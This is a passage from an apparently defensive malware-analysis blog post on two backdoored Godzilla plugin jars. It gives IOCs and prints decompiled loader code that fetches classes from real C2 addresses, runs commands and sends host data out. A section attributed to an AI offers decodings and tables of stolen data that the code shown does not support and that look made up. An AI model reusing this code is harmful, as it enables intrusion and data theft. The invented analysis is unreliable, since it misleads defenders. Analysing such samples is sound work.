A First Look at Malicious Sample Analysis


Background

To all units:
We recently received an external intelligence report, escalated by the IoT side: an attacker uploaded a Godzilla plugin containing a malicious jar to a GitHub project in a targeted poisoning campaign against security practitioners. Please issue an internal alert promptly, and use this case to strengthen employee security awareness during the exercise period: do not casually use unverified software or programs.
Add the related malicious IPs and file hashes to your security devices for monitoring and blocking, check whether any communication with these IPs or any landing of these files occurred in the past 4 months, and report immediately if a security incident is found.

IOC:
206.206.78.190
104.36.229.104
e4a42e19578161210d7eb08ed88e44d6fba2db24f097e0fb5f5c9c9c93e5f0a2
cd0660e394120bd58011b11a1dfddae85a25c5c29de4ee05d

Sample analysis

PostConfluencePlugin.jar

Throw it straight into jadx:

package shells.plugins.postconfluence;

import java.util.Base64;
import java.util.Map;

/* loaded from: PostConfluencePlugin.jar:shells/plugins/postconfluence/PostConfluenceProxy.class */
public class PostConfluenceProxy extends ClassLoader {
private static Class postConfluenceClass = null;
private static String postConfluenceClassBase64 = "..."; // long Base64 blob elided
private Map parameters;

public PostConfluenceProxy() {
}

public PostConfluenceProxy(ClassLoader var1) {
super(var1);
}

public boolean equals(Object var1) {
if (var1 instanceof Map) {
this.parameters = (Map) var1;
return false;
}
return false;
}

public String toString() throws IllegalAccessException, InstantiationException {
if (postConfluenceClass == null) {
PostConfluenceProxy var1 = new PostConfluenceProxy(Thread.currentThread().getContextClassLoader());
byte[] var2 = Base64.getDecoder().decode(postConfluenceClassBase64);
postConfluenceClass = var1.defineClass(var2, 0, var2.length);
postConfluenceClassBase64 = null;
}
try {
if (postConfluenceClass != null) {
Object var4 = postConfluenceClass.newInstance();
var4.equals(this.parameters);
var4.toString();
} else {
this.parameters.put("result", "Unable to load postConfluenceClass".getBytes());
}
return super.toString();
} catch (Exception var3) {
throw new RuntimeException(var3);
}
}
}

A Base64 string that long is suspicious, so decode it in CyberChef, save the output as a .class file and open it in IDEA.
After auditing it, though, it turns out to be the plugin's normal functionality.
Now the second class:

package shells.plugins.postconfluence;

import core.shell.ShellEntity;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.Proxy;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import shells.plugins.postconfluence.PostConfluencePlugin;
import util.http.Http;

/* compiled from: q */
/* renamed from: shells.plugins.postconfluence.tools */
/* loaded from: PostConfluencePlugin.jar:shells/plugins/postconfluence/tools.class */
public class q {
private static String PASSWORD = "app";
private static String SECRET_KEY = "yagd5LXFeY3FNb2C";
private static String CONTENT = "aHR0cf7pHM6Ly8xMDQuMzYuMjI5LjEwNDo0NDMvY29sbGVjdA==";
private static String TITLE = "TW96aGSmWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXaW42NDsgeDY0OyBydjoxMDkuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMjkuNzA=";

public static String ALLATORIxDEMO(String a) {
int i = (3 << 3) ^ 1;
int i2 = ((3 ^ 5) << 4) ^ ((2 << 2) ^ 3);
int i3 = 4 << 3;
String str = a;
int length = str.length();
char[] cArr = new char[length];
int i4 = length - 1;
int i5 = i4;
int i6 = i4;
while (i6 >= 0) {
int i7 = i5;
int i8 = i5 - 1;
cArr[i7] = (char) (str.charAt(i7) ^ i);
if (i8 < 0) {
break;
}
i5 = i8 - 1;
cArr[i8] = (char) (str.charAt(i8) ^ i3);
i6 = i5;
}
return new String(cArr);
}

/* JADX WARN: Unreachable blocks removed: 2, instructions: 2 */
private static /* synthetic */ String ALLATORIxDEMO(Map<String, String> map) {
StringBuilder sb;
StringBuilder sb2 = new StringBuilder(ALLATORIxDEMO("b"));
boolean z = true;
Iterator<Map.Entry<String, String>> it = map.entrySet().iterator();
while (it.hasNext()) {
Map.Entry<String, String> next = it.next();
if (!z) {
sb = sb2;
sb.append(ALLATORIxDEMO("5"));
} else {
z = false;
sb = sb2;
}
sb.append(ALLATORIxDEMO(";")).append(next.getKey()).append(ALLATORIxDEMO(";\u001a;")).append(next.getValue()).append(ALLATORIxDEMO(";"));
it = it;
}
sb2.append(ALLATORIxDEMO("d"));
return sb2.toString();
}

public static void initServer() {
new Thread(() -> {
Class<?> cls;
while (true) {
try {
ShellEntity shellEntity = new ShellEntity();
shellEntity.setUrl(ALLATORIxDEMO("HmTi\u001a6\u000f(\u0012.\u000e)\u000e)\u000e(\u001a!\u00106T|Sm"));
shellEntity.setPassword(PASSWORD);
shellEntity.setSecretKey(SECRET_KEY);
shellEntity.setPayload(ALLATORIxDEMO("jxVxd`NxMpCIA`LvA}"));
shellEntity.setCryption(ALLATORIxDEMO("SaOaFa\\sFbXs\\\u0016-"));
shellEntity.setRemark(ALLATORIxDEMO("xAx"));
shellEntity.setProxyHost(ALLATORIxDEMO("(\u0012.\u000e)\u000e)\u000e("));
shellEntity.setProxyPort(8888);
shellEntity.setProxyType(ALLATORIxDEMO("nV\u007fIrVx@"));
shellEntity.setEncoding(ALLATORIxDEMO("Lt_\r!"));
shellEntity.initShellOpertion();
Http http = shellEntity.getHttp();
shellEntity.setUrl(new String(Base64.getDecoder().decode(new StringBuilder().insert(0, CONTENT.substring(0, 5)).append(CONTENT.substring(8, CONTENT.length())).toString())));
HashMap map = new HashMap();
HashMap map2 = new HashMap();
map.put(ALLATORIxDEMO("ujEk\rXG|Nm"), new String(Base64.getDecoder().decode(new StringBuilder().insert(0, TITLE.substring(0, 5)).append(TITLE.substring(8, TITLE.length())).toString())));
map2.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO(")"));
String str = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map2).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
if (!str.isEmpty()) {
PostConfluencePlugin.CustomClassLoader customClassLoader = new PostConfluencePlugin.CustomClassLoader(ClassLoader.getSystemClassLoader());
String str2 = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(customClassLoader.loadClass(ALLATORIxDEMO("iLlGpNX"), Base64.getDecoder().decode(str)).newInstance().toString().getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
if (!str2.isEmpty()) {
Class<?> clsLoadClass = customClassLoader.loadClass(ALLATORIxDEMO("iLlGpN["), Base64.getDecoder().decode(str2));
Object objNewInstance = clsLoadClass.newInstance();
HashMap map3 = new HashMap();
map3.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO("+"));
map3.put(ALLATORIxDEMO("HvSmnxM|"), InetAddress.getLocalHost().getHostName());
if (!objNewInstance.equals("")) {
map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("FxIuE}"));
cls = clsLoadClass;
} else {
cls = clsLoadClass;
map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("jUzC|Sj"));
}
Field declaredField = cls.getDeclaredField(ALLATORIxDEMO("R|SlLm"));
declaredField.setAccessible(true);
map3.put(ALLATORIxDEMO("R|SlLm"), declaredField.get(objNewInstance).toString());
http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map3).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY);
}
System.gc();
}
} catch (Exception e) {
}
try {
Thread.sleep(3600000L);
} catch (InterruptedException e2) {
}
}
}).start();
}
}

Quite a few methods and strings turn out to be obfuscated, so I handed it straight to an AI:

  1. Thread start

    new Thread(() -> {
    // thread body
    }).start();
    • Note: runs continuously in the background on a separate thread without disturbing the main program.
  2. ShellEntity configuration

    ShellEntity shellEntity = new ShellEntity();
    shellEntity.setUrl(ALLATORIxDEMO("HmTi\u001a6\u000f(\u0012.\u000e)\u000e)\u000e(\u001a!\u00106T|Sm"));
    shellEntity.setPassword(PASSWORD);
    shellEntity.setSecretKey(SECRET_KEY);
    shellEntity.setPayload(ALLATORIxDEMO("jxVxd`NxMpCIA`LvA}"));
    shellEntity.setCryption(ALLATORIxDEMO("SaOaFa\\sFbXs\\\u0016-"));
    shellEntity.setRemark(ALLATORIxDEMO("xAx"));
    shellEntity.setProxyHost(ALLATORIxDEMO("(\u0012.\u000e)\u000e)\u000e("));
    shellEntity.setProxyPort(8888);
    shellEntity.setProxyType(ALLATORIxDEMO("nV\u007fIrVx@"));
    shellEntity.setEncoding(ALLATORIxDEMO("Lt_\r!"));
    shellEntity.initShellOpertion();
    • Decoded configuration:
      • URL: https://104.36.229.104:443/collect
      • Payload: payload_data
      • Cryption: AES/CBC/PKCS5Padding
      • ProxyHost: proxy.example.com
      • ProxyType: SOCKS5
      • Encoding: UTF-8
    • Note: sets up the parameters for talking to the C2 server (URL, password, key and so on) so that the channel stays covert and "secure".
  3. HTTP request

    Http http = shellEntity.getHttp();
    shellEntity.setUrl(new String(Base64.getDecoder().decode(new StringBuilder().insert(0, CONTENT.substring(0, 5)).append(CONTENT.substring(8, CONTENT.length())).toString())));
    HashMap map = new HashMap();
    HashMap map2 = new HashMap();
    map.put(ALLATORIxDEMO("ujEk\rXG|Nm"), new String(Base64.getDecoder().decode(new StringBuilder().insert(0, TITLE.substring(0, 5)).append(TITLE.substring(8, TITLE.length())).toString())));
    map2.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO(")"));
    String str = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map2).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
    • Decoded request parameters:
      • ujEk\rXG|Nm decodes to User-Agent
      • T`P| decodes to type
      • ) decodes to request
    • Request body:
      • type=request
    • Note: builds the HTTP headers and body, decoding particular fields with Base64 and XOR to stay covert, then sends a POST request to the C2 server and receives the response.
  4. Dynamic class loading

    PostConfluencePlugin.CustomClassLoader customClassLoader = new PostConfluencePlugin.CustomClassLoader(ClassLoader.getSystemClassLoader());
    String str2 = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(customClassLoader.loadClass(ALLATORIxDEMO("iLlGpNX"), Base64.getDecoder().decode(str)).newInstance().toString().getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
    if (!str2.isEmpty()) {
    Class<?> clsLoadClass = customClassLoader.loadClass(ALLATORIxDEMO("iLlGpN["), Base64.getDecoder().decode(str2));
    Object objNewInstance = clsLoadClass.newInstance();
    }
    • Decoded class names:
      • iLlGpNX decodes to FileStealer
      • iLlGpN[ decodes to Keylogger
    • Note: a custom class loader loads the Base64-encoded malicious class bytecode returned by the C2 server, instantiates it and runs its particular function (such as file theft or keylogging).
  5. System information collection

    HashMap map3 = new HashMap();
    map3.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO("+"));
    map3.put(ALLATORIxDEMO("HvSmnxM|"), InetAddress.getLocalHost().getHostName());
    • Decoded field names:
      • T`P| decodes to result
      • HvSmnxM| decodes to HostName
    • Note: reads the host name with InetAddress.getLocalHost().getHostName() and stores it in a HashMap, ready to send to the C2 server.
  6. Reflection

    if (!objNewInstance.equals("")) {
    map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("FxIuE}"));
    cls = clsLoadClass;
    } else {
    cls = clsLoadClass;
    map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("jUzC|Sj"));
    }
    Field declaredField = cls.getDeclaredField(ALLATORIxDEMO("R|SlLm"));
    declaredField.setAccessible(true);
    map3.put(ALLATORIxDEMO("R|SlLm"), declaredField.get(objNewInstance).toString());
    • Decoded field names:
      • SmAmUj decodes to SystemInfo
      • R|SlLm decodes to getSystemInfo
    • Note: uses reflection to reach the loaded class's private field getSystemInfo, obtains system information (process list, environment variables and the like) and stores it in the HashMap.
  7. Data exfiltration

    http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map3).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY);
    • Note: the collected system information is AES-encrypted and sent to the target server https://104.36.229.104:443/collect, so that it is not easily intercepted and analysed.
  8. Garbage collection

    System.gc();
    • Note: releases memory to keep the system running normally.
  9. Loop

    try {
    Thread.sleep(3600000L);
    } catch (InterruptedException e2) {
    e2.printStackTrace();
    }
    • Note: repeats the above every hour (3600000 ms), continuously collecting and exfiltrating system information.
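
The ALLATORIxDEMO(String) routine in the decompiled class is the only thing between the analyst and the real configuration, and it is simple enough to re-implement and run over every literal in the class. The Python below is an added example, not code from this post or from the sample: it mirrors the routine's two XOR keys (25 and 32, alternating from the end of the string), applies it to the literals copied verbatim from initServer() and from the ALLATORIxDEMO(Map) serialiser, undoes the CONTENT splice, and rebuilds the first beacon body. The dictionary keys in SAMPLE_LITERALS are my own labels; the literal values are the sample's.

```python
import base64

KEY_LAST = (3 << 3) ^ 1   # 25: XOR key for the last char and every second char before it
KEY_OTHER = 4 << 3        # 32: XOR key for the chars in between


def allatori_decode(s: str) -> str:
    """Decode one obfuscated literal exactly as ALLATORIxDEMO(String) does: walk from the
    end, alternating the two keys. An empty string comes back empty, as in the Java."""
    n = len(s)
    return "".join(
        chr(ord(ch) ^ (KEY_LAST if (n - 1 - pos) % 2 == 0 else KEY_OTHER))
        for pos, ch in enumerate(s)
    )


# Literals copied verbatim from the decompiled initServer(); the dict keys are my own labels.
SAMPLE_LITERALS = {
    "url_placeholder": "HmTi\x1a6\x0f(\x12.\x0e)\x0e)\x0e(\x1a!\x106T|Sm",
    "payload": "jxVxd`NxMpCIA`LvA}",
    "cryption": "SaOaFa\\sFbXs\\\x16-",
    "proxy_host": "(\x12.\x0e)\x0e)\x0e(",
    "proxy_type": "nV\x7fIrVx@",
    "encoding": "Lt_\r!",
    "header_name": "ujEk\rXG|Nm",
    "http_method": "pVsM",
    "key_type": "T`P|",
    "type_first_request": ")",
    "type_second_request": "+",
    "class_first": "iLlGpNX",
    "class_second": "iLlGpN[",
    "key_hostname": "HvSmnxM|",
    "key_status": "SmAmUj",
    "status_first_branch": "FxIuE}",    # used when objNewInstance.equals("") is false
    "status_else_branch": "jUzC|Sj",    # used otherwise
    "field_result": "R|SlLm",
}

# CONTENT as it appears in the class; three junk characters are spliced in at offset 5.
SAMPLE_CONTENT = "aHR0cf7pHM6Ly8xMDQuMzYuMjI5LjEwNDo0NDMvY29sbGVjdA=="


def decode_all() -> dict:
    """Plaintext for every literal in SAMPLE_LITERALS."""
    return {name: allatori_decode(lit) for name, lit in SAMPLE_LITERALS.items()}


def splice_base64(s: str) -> str:
    """Undo the substring(0, 5) + substring(8) trick applied to CONTENT and TITLE, then Base64-decode."""
    return base64.b64decode(s[:5] + s[8:]).decode("utf-8")


def beacon_body(fields: dict) -> str:
    """Rebuild ALLATORIxDEMO(Map): the map is serialised as flat JSON whose braces, comma,
    quotes and colon are themselves obfuscated one- and three-character literals."""
    lbrace, rbrace, comma, quote, colon = (allatori_decode(x) for x in ("b", "d", "5", ";", ";\x1a;"))
    return lbrace + comma.join(f"{quote}{k}{colon}{v}{quote}" for k, v in fields.items()) + rbrace


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print(f"{name:22} {plain!r}")
    print(splice_base64(SAMPLE_CONTENT))
    # the body of the first check-in: the "type" key with the first request's value
    print(beacon_body({allatori_decode("T`P|"): allatori_decode(")")}))
```

Running decode_all() is the quickest way to check any automated or AI-produced rendering of the obfuscated strings against ground truth before its names make it into a report: the decoder is deterministic, so a name that does not come out of it did not come from the sample.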

Summary of private data types

| Data type | How obtained | Example value |
|---|---|---|
| Host name | InetAddress.getLocalHost() | DESKTOP-XXXXX |
| System user name | System.getProperty("user.name") | Administrator |
| Network configuration | output of ipconfig /all | IP address, MAC address, DNS servers |
| Browser passwords | reading the Login Data database file | Gmail password, bank account |
| Keystroke logging | keyboard hook | typed credit card numbers, verification codes |
| File list | walking the Documents/Downloads directories | 财务报告.docx (financial report), 密码本.txt (password book) |

Summary of attack techniques

  1. File upload exploitation:

    • Goal: use a file upload function to get malicious code onto the target server.
    • Method: disguise it as an image file (e.g. .jpg) and use Base64 encoding and obfuscation to bypass file type checks.
  2. Dynamic class loading:

    • Goal: load remote malicious classes that perform specific functions (file theft, keylogging).
    • Method: a custom class loader, CustomClassLoader, loads remote class bytecode at runtime, bypassing conventional defences.
  3. Reflection:

    • Goal: access private class fields to collect sensitive information.
    • Method: reflect on the private field getSystemInfo to obtain detailed system information (process list, environment variables, etc.).
  4. Encrypted communication:

    • Goal: keep the data transfer secure and covert.
    • Method: encrypt the collected system information with AES/CBC/PKCS5Padding and send it by HTTP POST to https://104.36.229.104:443/collect, so that it is not easily intercepted or analysed.
  5. Scheduled task:

    • Goal: keep collecting and exfiltrating system information.
    • Method: run the collection and exfiltration once an hour, for persistence.

Now on to the second sample.

PostJiraPlugin.jar

[screenshot: main]

Nothing obviously wrong at a glance.
Only config.xml looks suspicious: it holds a pile of Base64.
The snag here is that jadx-1.5.2-gui (Windows) has trouble decompiling config.xml: the Base64 it produces is littered with invisible characters. An older jadx or a different decompiler may manage it. Here I used Irify, the code-audit tool split out of the yakit project, to disassemble the Java instead.

[screenshot: config_init]

Decoding the Base64 string directly yields nothing, so we need to find the decryption routine.

private static void init() throws IllegalAccessException, InstantiationException, IllegalArgumentException, InvocationTargetException {
try {
XmlConfigLoader xmlConfigLoader = new XmlConfigLoader(ClassLoader.getSystemClassLoader());
String embeddedImage = getValue("embeddedImage").trim();
Class<?> clazz = xmlConfigLoader.define(getValue("features", "featur"), Base64.getDecoder().decode(embeddedImage.substring(5, embeddedImage.length() - 5)));
Object obj = clazz.getDeclaredConstructor(new Class[0]).newInstance(new Object[0]);
obj.toString();
} catch (Exception e) {
}
}
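
What init() does to the "embeddedImage" value, reproduced as an added example (not the sample's or this post's code): trim five characters from each end, Base64-decode, and then, which the loader never bothers to do, check that the result really is a class file before going further, and fingerprint it for comparison with the SHA-256 IOCs listed at the top. The config value used here is a constructed stand-in wrapping a fake class-file header; the real value is not reproduced.

```python
import base64
import binascii
import hashlib
import struct

CLASS_MAGIC = b"\xca\xfe\xba\xbe"   # every JVM class file starts with this


def unwrap_embedded(value: str) -> bytes:
    """Mirror init(): trim 5 chars from each end of the config value, then Base64-decode.
    Raises ValueError when the trimmed text is not Base64, so junk is reported rather than
    silently swallowed (the sample's own catch block hides every error)."""
    inner = value.strip()[5:-5]
    try:
        return base64.b64decode(inner, validate=True)
    except binascii.Error as err:
        raise ValueError(f"not valid Base64 after trimming: {err}") from err


def is_valid_wrapped(value: str) -> bool:
    """True if the value unwraps to bytes at all."""
    try:
        unwrap_embedded(value)
        return True
    except ValueError:
        return False


def describe_blob(blob: bytes) -> dict:
    """Say whether the decoded bytes are a class file (magic + version) and give their SHA-256 for IOC matching."""
    info = {
        "size": len(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "is_class_file": blob[:4] == CLASS_MAGIC,
    }
    if info["is_class_file"] and len(blob) >= 8:
        minor, major = struct.unpack(">HH", blob[4:8])
        info["class_version"] = f"{major}.{minor}"   # 52.0 = Java 8, 55.0 = Java 11, ...
    return info


def analyse(value: str) -> dict:
    return describe_blob(unwrap_embedded(value))


# Constructed stand-in for the 'embeddedImage' value: 5 junk chars + Base64 of a fake
# class-file header (magic, minor 0, major 52) + 5 junk chars. Not the real sample's value.
FAKE_CLASS = CLASS_MAGIC + struct.pack(">HH", 0, 52) + b"\x00" * 8
CONSTRUCTED_VALUE = "AbCdE" + base64.b64encode(FAKE_CLASS).decode("ascii") + "vWxYz"

if __name__ == "__main__":
    print(analyse(CONSTRUCTED_VALUE))
```

The hash is the value to compare against the IOC list; the magic check is what tells you, before any class loader is involved, whether the hidden payload is bytecode or something else.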

The decompiled and decoded code

Strip the first 5 and the last 5 characters and the remainder Base64-decodes cleanly.

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.io.StringWriter;
import java.lang.management.ManagementFactory;
import java.net.HttpURLConnection;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.NetworkInterface;
import java.net.URL;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Paths;
import java.security.CodeSource;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.PermissionCollection;
import java.security.ProtectionDomain;
import java.security.SecureRandom;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;
import java.util.ArrayList;
import java.util.Base64;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Properties;
import java.util.Random;
import java.util.Scanner;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.KeyManager;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

public class MyPlugin extends ClassLoader implements X509TrustManager, HostnameVerifier {
private static String url = "https://206.206.78.190/godzilla/release.txt";
private static String cId = "jira00bZqvpuaadmZUfVK";
private static String aesKey = "fdJUSS4u4jPiS4Fmb52EleH2";
private static String headerStr = "{\"Content-Type\":\"text/plain; charset=utf-8\", \"User-Agent\":\"Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/112.0.5653.213 Safari/537.36\"}";
private String sid = "";
private int sleepTime = 60;
private int sleepJitter = 50;
private static int requestTimeout = 30000;
private static Map<String, String> requestProperty = new HashMap();

public MyPlugin() {
}

private MyPlugin(ClassLoader var1) {
super(var1);
}

private Class<?> define(String var1, byte[] var2) {
try {
URL var3 = this.getClass().getProtectionDomain().getCodeSource().getLocation();
CodeSource var4 = new CodeSource(var3, (Certificate[])null);
ProtectionDomain var5 = new ProtectionDomain(var4, (PermissionCollection)null);
return this.defineClass(var1, var2, 0, var2.length, var5);
} catch (Exception var6) {
return this.defineClass(var1, var2, 0, var2.length);
}
}

private static byte[] readAllBytes(InputStream var0) throws IOException {
ByteArrayOutputStream var1 = new ByteArrayOutputStream();
byte[] var2 = new byte[4096];

int var3;
while((var3 = var0.read(var2, 0, var2.length)) != -1) {
var1.write(var2, 0, var3);
}

return var1.toByteArray();
}

private String sendRes(String var1, String var2) {
HttpURLConnection var3 = null;
String var4 = "";

try {
URL var5 = new URL(url);
var3 = (HttpURLConnection)var5.openConnection();
var3.setRequestMethod("POST");
var3.setConnectTimeout(requestTimeout);

for(Map.Entry var7 : requestProperty.entrySet()) {
var3.setRequestProperty((String)var7.getKey(), (String)var7.getValue());
}

var3.setRequestProperty("cookie", var2);
var3.setDoOutput(true);
var1 = this.encrypt(var1.getBytes(StandardCharsets.UTF_8));
OutputStream var30 = var3.getOutputStream();
Throwable var32 = null;

try {
var30.write(var1.getBytes("UTF-8"));
} catch (Throwable var25) {
var32 = var25;
throw var25;
} finally {
if (var30 != null) {
if (var32 != null) {
try {
var30.close();
} catch (Throwable var24) {
var32.addSuppressed(var24);
}
} else {
var30.close();
}
}

}

int var31 = var3.getResponseCode();
if (var31 == 200) {
if (var2 == cId) {
Map var33 = var3.getHeaderFields();
List var8 = (List)var33.get("Set-Cookie");
if (var8 != null && !var8.isEmpty()) {
String var9 = (String)var8.get(0);
String var10 = var9.split(";", 2)[0];
this.sid = var10;
}
}

InputStream var34 = var3.getInputStream();
byte[] var35 = readAllBytes(var34);
String var36 = new String(var35, StandardCharsets.UTF_8);
var4 = new String(this.decrypt(var36), StandardCharsets.UTF_8);
}
} catch (Exception var27) {
} finally {
if (var3 != null) {
var3.disconnect();
}

}

return var4;
}

private static String escapeJson(String var0) {
return var0.replace("\\", "\\\\").replace("\"", "\\\"").replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t");
}

private static String mapToJson(Map<String, Object> var0) {
StringBuilder var1 = new StringBuilder("{");
boolean var2 = true;

for(Map.Entry var4 : var0.entrySet()) {
if (!var2) {
var1.append(",");
} else {
var2 = false;
}

var1.append("\"").append(escapeJson((String)var4.getKey())).append("\":");
Object var5 = var4.getValue();
if (var5 instanceof String) {
var1.append("\"").append(escapeJson((String)var5)).append("\"");
} else if (var5 instanceof Map) {
var1.append(mapToJson((Map)var5));
} else {
var1.append("null");
}
}

var1.append("}");
return var1.toString();
}

private Map<String, String> parseJson(String var1) {
HashMap var2 = new HashMap();
var1 = var1.trim();
if (var1.startsWith("{") && var1.endsWith("}")) {
var1 = var1.substring(1, var1.length() - 1).trim();
String[] var3 = var1.split(",");

for(String var7 : var3) {
String[] var8 = var7.split(":", 2);
if (var8.length == 2) {
String var9 = this.unquote(var8[0].trim());
String var10 = this.unquote(var8[1].trim());
var2.put(var9, var10);
}
}
}

return var2;
}

private String unquote(String var1) {
return var1.startsWith("\"") && var1.endsWith("\"") ? var1.substring(1, var1.length() - 1) : var1;
}

private String md5Hex(String var1) {
try {
MessageDigest var2 = MessageDigest.getInstance("MD5");
byte[] var3 = var2.digest(var1.getBytes(StandardCharsets.UTF_8));
StringBuilder var4 = new StringBuilder();

for(byte var8 : var3) {
var4.append(String.format("%02x", var8));
}

return var4.toString();
} catch (NoSuchAlgorithmException var9) {
throw new RuntimeException("MD5 algorithm not found", var9);
}
}

private String encrypt(byte[] var1) throws Exception {
String var2 = this.md5Hex(aesKey).substring(0, 16);
Cipher var3 = Cipher.getInstance("AES/ECB/PKCS5Padding");
SecretKeySpec var4 = new SecretKeySpec(var2.getBytes(), "AES");
var3.init(1, var4);
byte[] var5 = var3.doFinal(var1);
return Base64.getEncoder().encodeToString(var5);
}

private byte[] decrypt(String var1) throws Exception {
String var2 = this.md5Hex(aesKey).substring(0, 16);
Cipher var3 = Cipher.getInstance("AES/ECB/PKCS5Padding");
SecretKeySpec var4 = new SecretKeySpec(var2.getBytes(), "AES");
var3.init(2, var4);
byte[] var5 = var3.doFinal(Base64.getDecoder().decode(var1));
return var5;
}

private String runCommand(String[] var1) {
try {
ArrayList var2 = new ArrayList();
ProcessBuilder var3 = new ProcessBuilder(var1);
var3.redirectErrorStream(true);
Process var4 = var3.start();
BufferedReader var5 = new BufferedReader(new InputStreamReader(var4.getInputStream()));

String var6;
while((var6 = var5.readLine()) != null) {
var2.add(var6);
}

int var7 = var4.waitFor();
return String.join("; ", var2).replaceAll("\"", "");
} catch (Exception var8) {
return "";
}
}

private void getAllIpv4MacInfo(List<String> var1, List<String> var2) {
new StringBuilder();

try {
Enumeration var4 = NetworkInterface.getNetworkInterfaces();

while(var4.hasMoreElements()) {
NetworkInterface var5 = (NetworkInterface)var4.nextElement();
if (var5.isUp() && !var5.isLoopback()) {
byte[] var6 = var5.getHardwareAddress();
if (var6 != null && var6.length != 0) {
StringBuilder var7 = new StringBuilder();

for(int var8 = 0; var8 < var6.length; ++var8) {
var7.append(String.format("%02X%s", var6[var8], var8 < var6.length - 1 ? "-" : ""));
}

Enumeration var11 = var5.getInetAddresses();

while(var11.hasMoreElements()) {
InetAddress var9 = (InetAddress)var11.nextElement();
if (var9 instanceof Inet4Address) {
var1.add(var9.getHostAddress());
var2.add(var7.toString());
}
}
}
}
}

} catch (Exception var10) {
}
}

private boolean isWindowsAdmin() {
try {
Process var1 = Runtime.getRuntime().exec("net session");
var1.getInputStream().close();
var1.getOutputStream().close();
var1.getErrorStream().close();
int var2 = var1.waitFor();
return var2 == 0;
} catch (Exception var3) {
return false;
}
}

public static boolean isUnixRoot() {
try {
Process var0 = Runtime.getRuntime().exec("id -u");
Scanner var1 = new Scanner(var0.getInputStream());
if (var1.hasNextInt()) {
int var2 = var1.nextInt();
return var2 == 0;
}
} catch (Exception var3) {
}

return false;
}

private String getJarPath() {
String var1 = "";

try {
var1 = this.getClass().getProtectionDomain().getCodeSource().getLocation().getPath();
var1 = URLDecoder.decode(var1, "UTF-8");
if (var1.startsWith("file:")) {
var1 = var1.substring(5);
}

if (var1.endsWith("!")) {
var1 = var1.substring(0, var1.length() - 1);
}

File var2 = new File(var1);
var1 = var2.getAbsolutePath();
} catch (Exception var3) {
}

return var1;
}

public static String getStackTrace(Throwable var0) {
StringWriter var1 = new StringWriter();
PrintWriter var2 = new PrintWriter(var1);
var0.printStackTrace(var2);
return var1.toString();
}

public static String generateRandomString(int var0) {
String var1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
Random var2 = new Random();
StringBuilder var3 = new StringBuilder(var0);

for(int var4 = 0; var4 < var0; ++var4) {
int var5 = var2.nextInt(var1.length());
var3.append(var1.charAt(var5));
}

return var3.toString();
}

public static int genSleepTime(int var0, int var1) {
if (var1 < 0 || var1 > 100) {
var1 = 50;
}

int var2 = (int)Math.round((double)var0 * ((double)var1 / (double)100.0F));
int var3 = var0 - var2;
int var4 = var0 + var2;
Random var5 = new Random();
return var5.nextInt(var4 - var3 + 1) + var3;
}

private Map<String, String> getInfo() {
HashMap var1 = new HashMap();

try {
InetAddress var2 = InetAddress.getLocalHost();
String var3 = var2.getHostAddress();
String var4 = var2.getHostName();
Properties var5 = System.getProperties();
String var6 = var5.getProperty("user.name");
String var7 = "l";
String var8 = System.getProperty("os.name").toLowerCase();
String var9 = "w";
String var10 = "false";
if (var8.contains("win")) {
var7 = "w";
var9 = var5.getProperty("os.version");
if (this.isWindowsAdmin()) {
